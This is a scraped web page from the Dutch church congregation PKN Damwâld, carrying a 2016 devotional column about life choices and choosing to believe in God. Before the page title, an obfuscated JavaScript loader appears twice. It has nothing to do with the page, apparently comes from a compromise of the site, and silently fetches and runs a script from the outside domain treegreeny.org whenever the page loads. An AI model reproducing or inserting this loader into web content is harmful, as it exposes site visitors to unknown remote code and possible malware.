;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Keuzes - PKN Damwâld

Keuzes

Gepubliceerd op: dinsdag 11 oktober 2016

Links of rechts? Ja … nee? Voor of tegen? Zwart of wit? Keuzes maken is onderdeel van het leven. Je moet regelmatig kleine en grote keuzes maken. Maak je keuze met je hart of je verstand? Soms lijkt het maken van keuzes een kwestie van blindelings gevoel … wel of niet, goed of slecht … Maar wat als het gaat over dé keuze in je leven ? Wat als links en rechts, zwart of wit daarbij ineens geen opties meer blijken te zijn? Is een pas op de plaats maken dan wellicht ook nog zinvol? De kunst van keuzes maken is als je weet welke mogelijkheden je hebt en welke consequenties er uit keuzes voort komen. Maar wat is de juiste keuze? Met andere woorden, een juiste keuze maken blijkt in de praktijk vaak een boel ‘onzekerheid’ en ‘stress’ op te leveren. Het risico blijft altijd aanwezig dat de beslissing die je uiteindelijk neemt verkeerd uit kan vallen, waardoor je steeds verder en verder bij je doel zult afdwalen. Ook al weet je verstand dat je geen andere keuze hebt, je gevoel kan het toch heel anders ervaren. Het is moeilijk om elke dag en bij iedere keuze ook te doen wat je hart zegt. Met als gevolg dat het in je hoofd begint te malen en te malen, zonder dat je daarbij tot een bevredigende oplossing kunt komen. Piekeren … tobben … prakkiseren ..

Je kunt wèl kiezen!

Als het gaat om geloven vraagt Jezus ons juist om een duidelijke keuze te maken of zoals de bekende Visje-posters het al pleegden te zeggen: ‘Kiezen voor God heeft grote gevolgen . . . niet kiezen ook!’. Vaak wordt gedacht dat we daardoor in een soort harnas worden gestopt. Maar God beperkt je vrijheid niet, Hij maakt je juist vrij! Want als het er op aankomt krijg je juist alle ruimte om een eigen keuze te maken! Geloof is een keuze vanuit het hart en tegelijk een beslissing met je verstand. Eén van die belangrijke momenten in je leven. Dat geloof biedt God zelf aan, door alle generaties heen, door alle eeuwen heen. Telkens weer, ook vandaag, voor iedereen. Ontdek dan dat Hij het is die ons een hoopvolle toekomst geeft en bedenk daarbij – vrij naar een quote van Nelson Mandela – dat je keuzes een afspiegeling mogen zijn van je hoop, niet van je angst.

Durf je God echt te leren kennen? Durf je uit je eigen veilige maar vaak beperkte ‘denkwereldje’ te stappen? Durf je Jezus volledig te vertrouwen dat Hij het beste met je voor heeft? En … als je dat niet durft, hoe komt dat dan? Ja, een juiste keuze maken … knap pittig !

Columnist:Kees

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns